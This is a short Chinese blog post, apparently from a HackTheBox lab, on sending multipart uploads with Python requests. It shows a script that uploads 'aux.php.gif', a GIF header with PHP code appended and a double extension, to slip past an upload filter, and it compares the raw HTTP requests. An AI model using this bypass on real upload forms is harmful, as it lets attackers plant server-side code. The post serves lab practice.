Python 文件上传
2021-12-15 本文已影响0人
夙小叶
截屏2021-12-15 18.57.24.png
def upload_fileEx(filename: str) -> None:
# files = { "myFile": (filename, open(EXPLOIT, "rb"), "image/png") }
files = [("myFile", (filename, r"GIF87a<?php echo(1); ?>", "image/gif")), ("submit", (None, "go!"))]
proxy = { "http": "http://127.0.0.1:8080" }
r = requests.post(url, files=files, proxies=proxy)
print(r.text)
if __name__ == '__main__':
upload_fileEx("aux.php.gif")
就是一个很简单的提交表单
<form action="/upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="myFile">
<br>
<input type="submit" name="submit" value="go!">
</form>
这是一开始的代码,然后失败了:
files = { "myFile": (filename, r"GIF87a<?php echo(1); ?>", "image/gif") }
r = requests.post(url, files=files, proxies=proxy)
请求头
POST /upload.php HTTP/1.1
Host: networked.htb
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 197
Content-Type: multipart/form-data; boundary=acba2ede0fd10bf0502358f99d6d20f3
--acba2ede0fd10bf0502358f99d6d20f3
Content-Disposition: form-data; name="myFile"; filename="aux.php.gif"
Content-Type: image/gif
GIF87a<?php echo(1); ?>
--acba2ede0fd10bf0502358f99d6d20f3--
对比成功上传的请求头
POST /upload.php HTTP/1.1
Host: networked.htb
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 287
Content-Type: multipart/form-data; boundary=20c3527f70dbcd8883630232a349fc35
--20c3527f70dbcd8883630232a349fc35
Content-Disposition: form-data; name="myFile"; filename="aux.php.gif"
Content-Type: image/gif
GIF87a<?php echo(1); ?>
--20c3527f70dbcd8883630232a349fc35
Content-Disposition: form-data; name="submit"
go!
--20c3527f70dbcd8883630232a349fc35--
其实是还有一个提交项的
Content-Disposition: form-data; name="submit"
go!
--20c3527f70dbcd8883630232a349fc35--
所以要提交两个文件,一个是要提交的文件,一个是键值对
files = [
("myFile", (filename, r"GIF87a<?php echo(1); ?>", "image/gif")),
("submit", (None, "go!"))
]
